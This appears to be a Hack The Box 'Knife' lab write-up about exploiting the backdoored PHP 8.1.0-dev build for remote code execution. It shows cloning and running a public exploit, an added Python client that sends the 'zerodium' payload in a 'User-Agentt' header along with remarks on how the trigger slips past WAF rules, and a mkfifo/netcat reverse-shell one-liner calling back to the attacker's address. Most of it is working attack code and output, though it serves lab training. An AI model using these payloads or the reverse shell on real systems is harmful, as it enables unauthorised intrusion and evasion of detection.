Remote Code Execution
I found the exploit online
┌──(kali㉿kali)-[~/archive/htb/labs/knife]
└─$ git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce.git ; cd php-8.1.0-dev-backdoor-rce
Cloning into 'php-8.1.0-dev-backdoor-rce'...
remote: Enumerating objects: 241, done.
remote: Counting objects: 100% (239/239), done.
remote: Compressing objects: 100% (113/113), done.
remote: Total 241 (delta 128), reused 232 (delta 124), pack-reused 2
receiving objects: 100% (241/241), 1.66 MiB | 9.18 MiB/s, done.
resolving deltas: 100% (128/128), done.
I downloaded the exploit repo to Kali
┌──(kali㉿kali)-[~/…/htb/labs/knife/php-8.1.0-dev-backdoor-rce]
└─$ python3 backdoor_php_8.1.0-dev.py
enter the host url:
http://10.10.10.242/
interactive shell is opened on http://10.10.10.242/
Can't acces tty; job crontol turned off.
$ id
uid=1000(james) gid=1000(james) groups=1000(james)
Done. It was that easy.
$ whoami
james
$ hostname
knife
$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.242 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:747b prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:747b prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:74:7b txqueuelen 1000 (Ethernet)
RX packets 472811 bytes 73481578 (73.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 479550 bytes 152353478 (152.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1302808 bytes 149342528 (149.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1302808 bytes 149342528 (149.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Initial foothold established on the target system as the james user by exploiting the backdoored PHP 8.1.0-dev build behind the web application
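What the exploit script does under the hood, as an added example that is not the flast101 script or code from this write-up: the backdoored PHP 8.1.0-dev build evaluates whatever follows the string `zerodium` in a `User-Agentt` request header as PHP, so one request with `zerodiumsystem("id");` in that header is the whole exploit. The client below sends that header and also does the pre-flight check a practitioner wants (the `X-Powered-By` banner) before firing. `BackdooredPHP`, `start_mock` and the mock's page body are constructed stand-ins so the code runs offline; they are hypothetical, not the real target, and the mock only understands the `system("...")` form of the payload.

```python
#!/usr/bin/env python3
"""Added example (not the flast101 script): the PHP 8.1.0-dev backdoor trigger
reproduced end to end against a constructed local mock so it runs offline."""
import http.server
import re
import subprocess
import threading
import urllib.request
from typing import Optional

TRIGGER = "zerodium"    # magic prefix the backdoored build looks for
HEADER = "User-Agentt"  # note the doubled 't'; the real User-Agent is untouched
PAGE_START = re.compile(r"<!DOCTYPE", re.IGNORECASE)


def build_payload(cmd: str) -> str:
    """Header value that makes the backdoor eval system("<cmd>") as PHP."""
    escaped = cmd.replace("\\", "\\\\").replace('"', '\\"')
    return f'{TRIGGER}system("{escaped}");'


def php_version(url: str, timeout: float = 5.0) -> Optional[str]:
    """Pre-flight check: X-Powered-By (e.g. 'PHP/8.1.0-dev') if PHP exposes it."""
    req = urllib.request.Request(url, method="HEAD")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.headers.get("X-Powered-By")


def run_command(url: str, cmd: str, timeout: float = 10.0) -> str:
    """Run `cmd` on a backdoored host; returns only the command's output.

    The backdoor evaluates the payload during request start-up, so system()
    output lands before the page's normal HTML; cut at the first <!DOCTYPE.
    """
    req = urllib.request.Request(url, headers={HEADER: build_payload(cmd)})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode(errors="replace")
    return PAGE_START.split(body, maxsplit=1)[0]


class BackdooredPHP(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for the vulnerable server (hypothetical, not PHP).

    Mirrors the backdoor's behaviour for the system("...") form only: if the
    User-Agentt header starts with 'zerodium', run the quoted command and
    emit its stdout ahead of the page body.
    """
    PAYLOAD = re.compile(r'^zerodiumsystem\("(.*)"\);$', re.DOTALL)

    def _serve(self) -> None:
        out = ""
        m = self.PAYLOAD.match(self.headers.get(HEADER, ""))
        if m:
            cmd = m.group(1).replace('\\"', '"').replace("\\\\", "\\")
            out = subprocess.run(cmd, shell=True, capture_output=True,
                                 text=True).stdout
        body = (out + "<!DOCTYPE html><html><body>mock page</body></html>").encode()
        self.send_response(200)
        self.send_header("X-Powered-By", "PHP/8.1.0-dev")
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if self.command != "HEAD":
            self.wfile.write(body)

    do_GET = do_HEAD = _serve

    def log_message(self, *args) -> None:  # keep the demo output quiet
        pass


def start_mock() -> str:
    """Start the mock on a random loopback port and return its base URL."""
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", 0), BackdooredPHP)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_address[1]}/"


if __name__ == "__main__":
    target = start_mock()  # swap in http://10.10.10.242/ for the real box
    print("X-Powered-By:", php_version(target))
    print(run_command(target, "id"), end="")
```

Two things worth noting from the design: the check is on a header PHP itself never reads (`User-Agentt`, with the extra `t`), so a normal `User-Agent` based WAF rule or access-log grep will not see the trigger, and the injected output appears before the page's own HTML because the backdoor fires during request start-up rather than inside the application.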
$ mkfifo /tmp/cesidpi; nc 10.10.14.2 9999 0</tmp/cesidpi | /bin/sh >/tmp/cesidpi 2>&1; rm /tmp/cesidpi
Since the shell session from the Python script is a bit funky, I will migrate it to another session that I can control properly
┌──(kali㉿kali)-[~/…/htb/labs/knife/php-8.1.0-dev-backdoor-rce]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.242] 50574
python3 -c 'import pty; pty.spawn("/bin/bash")'
james@knife:/$
james@knife:/$ export TERM=xterm-256color
james@knife:/$ alias ll='ls -lsaht --color=auto'
james@knife:/$
That’s a lot better